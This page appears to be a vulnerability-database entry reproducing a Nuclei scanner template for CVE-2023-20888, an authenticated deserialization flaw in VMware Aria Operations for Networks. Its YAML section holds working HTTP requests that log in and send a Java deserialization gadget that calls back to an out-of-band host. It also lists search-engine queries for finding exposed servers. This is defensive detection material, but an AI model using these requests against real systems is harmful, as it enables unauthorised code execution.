VMware Aria Operations for Networks - Remote Code Execution

2023-06-2708:37:06

ProjectDiscovery

github.com

vmware

aria

remote code execution

authenticated deserialization

cve2023

high severity

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

8.9 High

AI Score

Confidence

High

0.248 Low

EPSS

Percentile

96.7%

JSON

Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution.

id: CVE-2023-20888

info:
  name: VMware Aria Operations for Networks - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches or updates provided by VMware to mitigate this vulnerability.
  reference:
    - https://www.vmware.com/security/advisories/VMSA-2023-0012.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-20888
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-20888
    cwe-id: CWE-502
    epss-score: 0.21995
    epss-percentile: 0.96459
    cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: vmware
    product: vrealize_network_insight
    shodan-query:
      - title:"VMware Aria Operations"
      - http.title:"vmware vrealize network insight"
      - http.title:"vmware aria operations"
    fofa-query:
      - title="vmware vrealize network insight"
      - title="vmware aria operations"
    google-query:
      - intitle:"vmware aria operations"
      - intitle:"vmware vrealize network insight"
  tags: cve2023,cve,vmware,aria,rce,authenticated,oast

http:
  - raw:
      - |
        POST /api/auth/login HTTP/2
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8
        X-Vrni-Csrf-Token: null

        {"username":"{{username}}","password":"{{password}}","domain":"localdomain"}
      - |
        POST /api/events/push-notifications HTTP/2
        Host: {{Hostname}}
        X-Vrni-Csrf-Token: {{csrf}}
        Content-Type: application/json

        {"endOffset": "{{ generate_java_gadget("dns", "http://{{interactsh-url}}", "base64") }} "}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: status
        status:
          - 500

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'csrfToken":"([a-z0-9A-Z/+=]+)"'
        internal: true
        part: body
# digest: 4a0a00473045022100ba20a54a3a432df111348f25e911ec92d24abda137079f61775ecb964fa283eb022067d7d3b2b7c8063c4a7317c97ed7d3112d37e62ade88166e98f93e8d84ec5522:922c64590222798bb761d5b6d8e72950